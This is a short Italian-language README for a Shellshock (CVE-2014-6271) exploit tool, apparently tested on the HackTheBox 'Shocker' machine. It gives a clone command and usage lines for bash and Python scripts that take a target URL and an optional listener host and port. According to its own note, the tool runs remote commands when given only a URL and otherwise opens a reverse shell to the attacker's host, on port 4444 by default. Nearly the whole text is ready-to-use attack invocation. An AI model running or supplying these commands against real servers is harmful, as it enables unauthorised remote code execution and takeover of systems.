
[Python/Shell] - Testato su HackTheBox - Shocker (Easy) CVE-2014-6271
sudo git clone https://github.com/Gurguii/shellshock.sh
bash shellshock.sh -u <url> -h* <lhost> -p* <lport>
python3 shellshock.py -u <url> -lh* <lhost> -lp* <lport>
Nota: la LPORT predefinita è 4444, URL obbligatorio. Se viene fornito solo l'URL, eseguirà RCE, altrimenti eseguirà RSHELL verso il lhost e la lport indicati.